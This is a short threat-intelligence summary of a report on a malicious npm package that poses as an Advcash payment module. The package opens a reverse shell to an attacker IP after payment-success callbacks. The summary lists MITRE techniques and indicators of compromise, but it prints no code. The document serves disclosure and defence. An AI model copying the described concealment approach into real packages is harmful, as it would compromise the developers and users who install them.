The article discusses a malicious npm package, @naderabdi/merchant-advcash, which embeds a reverse shell trigger disguised as a legitimate payment processing module for the Advcash payment platform. This security threat is aimed at end users making transactions, leading to severe implications for their system’s security. Affected: npm package, Advcash platform, end users
Keypoints :
- A malicious npm package called @naderabdi/merchant-advcash has been discovered.
- The package contains a reverse shell triggered during payment success events.
- It poses as a legitimate Advcash payment processing module.
- The reverse shell connects to the attacker’s server at IP address 65.109.184.223 over TCP port 8443.
- Real business logic is implemented to disguise its true purpose.
- Similar stealthy techniques have been observed in recent malware incidents.
- The malicious code executes only after transactions complete, making it hard to detect.
- Package was reported and removed from npm to prevent further exploits.
- Security mechanisms like Socket monitoring can help detect such threats.
MITRE Techniques :
- T1071 – Application Layer Protocol: The package uses legitimate application layer protocols for payment processing.
- T1059 – Command and Scripting Interpreter: The reverse shell invokes a shell command via Node.js modules (net, child_process).
- T1203 – Exploitation for Client Execution: Exploits the context of trust in payment processing to execute malicious code.
Indicator of Compromise :
- [Malicious Package] @naderabdi/merchant-advcash
- [IP Address] 65.109.184.223
- [Port] 8443
- [Trigger Point] url_success() callback
- [Hashing Algorithm] SHA-256 used for payment token masking
Full Story: https://socket.dev/blog/npm-package-advcash-integration-triggers-reverse-shell
Views: 30
简体中文
Nederlands
Français
Bahasa Indonesia
日本語
Português